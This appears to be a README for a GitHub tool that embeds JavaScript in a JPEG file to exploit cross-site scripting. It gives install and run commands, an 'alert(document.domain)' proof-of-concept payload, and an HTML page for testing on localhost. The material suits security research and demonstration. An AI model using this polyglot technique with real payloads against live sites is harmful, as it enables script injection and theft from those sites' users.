- ImageMagick
sudo apt install imagemagick # in debian
git clone https://github.com/4n86rakam1/xss_injection_in_jpeg.git
cd xss_injection_in_jpeg
python3 exploit.py --payload 'alert(document.domain)' --imagesize 200x200 --output xss.js
-
Confirm to generate JavaScript file for exploiting XSS.
-
Change
src
attribute value inindex.html
to your output filename.e.g.
<!DOCTYPE html> <html lang="en"> <head> <script charset="ISO-8859-1" src="./xss.js"></script> </head> <body></body> </html>
-
Run HTTP Server.
e.g.
python3 -m http.server
-
open http://localhost:8000 in browser.
tested in Google Chrome Version 114.0.5735.106 (Official Build) (64-bit)
.